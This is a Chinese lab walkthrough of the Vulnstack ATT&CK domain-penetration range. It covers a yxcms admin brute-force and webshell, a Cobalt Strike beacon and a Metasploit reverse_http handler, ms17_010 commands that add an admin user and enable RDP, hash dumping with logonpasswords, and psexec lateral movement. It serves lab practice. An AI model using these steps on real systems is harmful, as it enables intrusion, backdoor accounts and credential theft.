ATT&CK实战系列(一)

本文较长,思路比较混乱,主要是提高实践体验,师傅们轻喷

由于之前一靶场环境问题,先做了二靶场
ATT&CK实战系列(二)琢磨篇

该靶机是红日安全团队出的域渗透靶机。
靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
压缩包中的win7为VM1,win2003为VM2,win2008为VM3,拓扑图如下所示:
在这里插入图片描述

环境说明

攻击机
攻击机 win7 ip:192.168.101.133
攻击机 kali ip:192.168.101.129
WEB机
win7 内网ip:10.10.10.130 外网ip:192.168.101.132
域成员
win2003 ip:10.10.10.131
域控
win2008 ip:10.10.10.132

kali设置成NAT模式,win7网络适配器1设置成NAT模式,网络适配器2设置成自定义(VMnet1仅主机模式),win2003、win2008 网络适配器设置成自定义(VMnet1仅主机模式)

主机默认开机密码都是hongrisec@2019,手动在win7的c盘下开启phpstudy,若phpstudy启动失败,建议重装。

设置完毕后VM1、VM2、VM3就在同一内网中了,只有VM1web服务器能够访问内网,所以要想访问win2008和win2003服务器必须要先拿下win7服务器,用它做跳板进内网进行横向渗透。

确定好环境网卡的配置
在这里插入图片描述
攻击机且同网段的机器能够访问到web机
在这里插入图片描述

实验开始

nmap扫描一下目标机
在这里插入图片描述

yxcms后台getshell

得知页面是yxcms,网上搜索历史漏洞,后台存在模板写入的getshell方式
打开默认后台 http://192.168.101.132/yxcms/index.php?r=admin/index/login
爆破一下,admin 123456 登进后台。
前台模板->管理模板文件->index_index.php处编辑,插入php语句
在这里插入图片描述
看到phpinfo页面,可getshell
在这里插入图片描述
写入简单的一句话再用蚁剑进行连接
在这里插入图片描述
在这里插入图片描述

收集系统信息

查看权限是管理员administrator,再判断该机器为双网卡
在这里插入图片描述
通过在蚁剑虚拟终端的命令执行tasklist /SVC,再将进程信息拿去对比发现不存在杀软在这里插入图片描述
再对比一下补丁信息
在这里插入图片描述
该机器可以有很多种提权方式,就没有一一写出来
在这里插入图片描述

上线至c2中

这里利用cs4生成exe后门上传到web机上
在这里插入图片描述
通过命令去执行该cs.exe
在这里插入图片描述
发现我们的cs上有web机器上线,先sleep 0消除减少目标机器交互的延迟
在这里插入图片描述
通过cs4自带的提权模块将administrtor权限提升到system权限
在这里插入图片描述

派生到msf

为了其他方便的利用与操作,可选择联动msf
在这里插入图片描述
msf中
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
在这里插入图片描述

探测内网存活主机

添加路由为后续对其他主机的利用做好准备
在这里插入图片描述
利用arp_scan模块探测一下内网存活主机
run post/windows/gather/arp_scanner rhosts=10.10.10.0/24
在这里插入图片描述
也可通过cs端口扫描插件对网段的内网主机进行探测(cs中无需添加路由)
在这里插入图片描述
利用网上的插件扫描了一波主机名及系统类型
在这里插入图片描述

探测内网主机端口

我们可以使用msf的模块,也可以先在msf中配置好socks代理模块
在这里插入图片描述
/etc/proxychains.conf中配置好代理端口
在这里插入图片描述
利用nmap对内网内10.10.10.0/24网段的主机进行端口扫描
proxychains nmap -sT -Pn -T4 10.10.10.0/24
在这里插入图片描述
也可以使用cs中的端口扫描差插件,显示的信息较为简单明了
在这里插入图片描述

拿下pc

利用ms17_010盲打一波,先探测再利用,但是拿不到shell均失败
在这里插入图片描述
但是可以用use auxiliary/admin/smb/ms17_010_command执行一些系统权限的命令可以拿下pc

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 10.10.10.131
set command net user zzzwj @!FuckSEC!@ /add #添加用户
run #成功执行
set command net localgroup administrators zzzwj /add #管理员权限
run #成功执行
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f'
run #成功执行

然后使用kali自带的rdesktop,proxychains连接pc的3389
proxychains rdesktop 10.10.10.131
(忘截图了。。。)

抓hash

cs中对域内机器进行哈希抓取
logonpasswords
在这里插入图片描述

冲域控

可建立smb隧道,利用psexec进行横向
这里较为详细介绍一下SMB Beacon
设置SMB监听器建立连接
SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。
在这里插入图片描述
因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效(系统防火墙默认是允许445的端口与外界通信的,其他端口可能会弹窗提醒,会导致远程命令行反弹shell失败)

SMB Beacon监听器对“提升权限”和“横向渗透”中很有用

SMB Beacon 配置
首先需要一个上线的主机,这里我使用的HTTP Beacon
主机上线后,新建一个SMB Beacon,输入监听器名称,选择Beacon SMB,管道名称可以直接默认,也可以自定义
在这里插入图片描述
接下来在Beacon中直接输入spawn SMB,这里的SMB指代的是创建的SMB Beacon的监听器名称,也可以直接右击session,在Spawn选项中选择刚添加的SMB Beacon
在这里插入图片描述
等待一会儿,就可以看到派生的SMB Beacon,在external中可以看到IP后有个∞∞字符
然后可以通过psexec模块进行横向,cs中的psexec,psexec_pth均尝试一下,隔一段时间就收到了域控主机的shell
在这里插入图片描述
在msf中的话,因为我们通过cs抓取了域管理的账号密码哈希之后,可以直接使用exploit/windows/smb/psexec模块,options中将参数补充拿下域控,且是系统权限
在这里插入图片描述

总的来说

通过yxcms后台getshell拿下权限,通过logonpasswords方式dump出了账号密码,最后在利用psexec模块进行横向拿shell
整体做完感觉绕了很多弯,没参考网上任何攻击思路,两天慢慢边翻阅资料边利用知识储备琢磨出来的,好的坏的过程我也都一一记录下来。师傅大佬们勿喷哦~
 
GOT IT!

 
******************************************************
具体利用方式需根据具体实践场景~

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
如果你现在正在被各种大型建站系统繁琐的功能而困扰,如果您的网站虽然只用得上其中很小一部分功能却不得不安装一大堆东西,面对各种复杂操作的同时还要忍受因为体积庞大而带来的运行效率低下的问题。那么这一款cms应该更加适合你的需要。用最少的代码做更多的事情是Yxcms的设计理念。完成同样的工作Yxcms会用更简洁、人性的方式去实现。 YXcms建站系统 v1.2.6 升级日志: 1、修正:资讯、图集列表排序从实际发布先后顺序改为按照发布时间先后排序 2、修正:部分虚拟主机后台备份时出现的警告提示 3、修正:添加文章或图集没有栏目时跳转页面没有加载样式 4、增加:为避免安装时采用默认密钥导致安全漏洞,安装时随机生成密钥 5、修正:会员中心资讯和图集预览链接参数错误修正 6、更改:为保证无安全隐患后台图集批量上传不支持FireFox 7、修正:解决安装选择不保留上传文件后默认无图封面会被删除的问题 8、增加:资讯和图集封面可以使用外部链接 9、BugFix:修正会员中心个人信息编辑邮件字段xss漏洞 10、BugFix:修正会员中心一处利用groupid的cookie注入漏洞 11、增加:采集插件,目前不支持对拓展字段采集 1.2.5到1.2.6没有对已有数据数据表改动 手动升级请保留配置文件和模板文件,其他覆盖即可,为了以防万一请升级之前做好备份 后台地址:http://youraddress/?r=admin 后台默认账户:admin 密码:123456

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值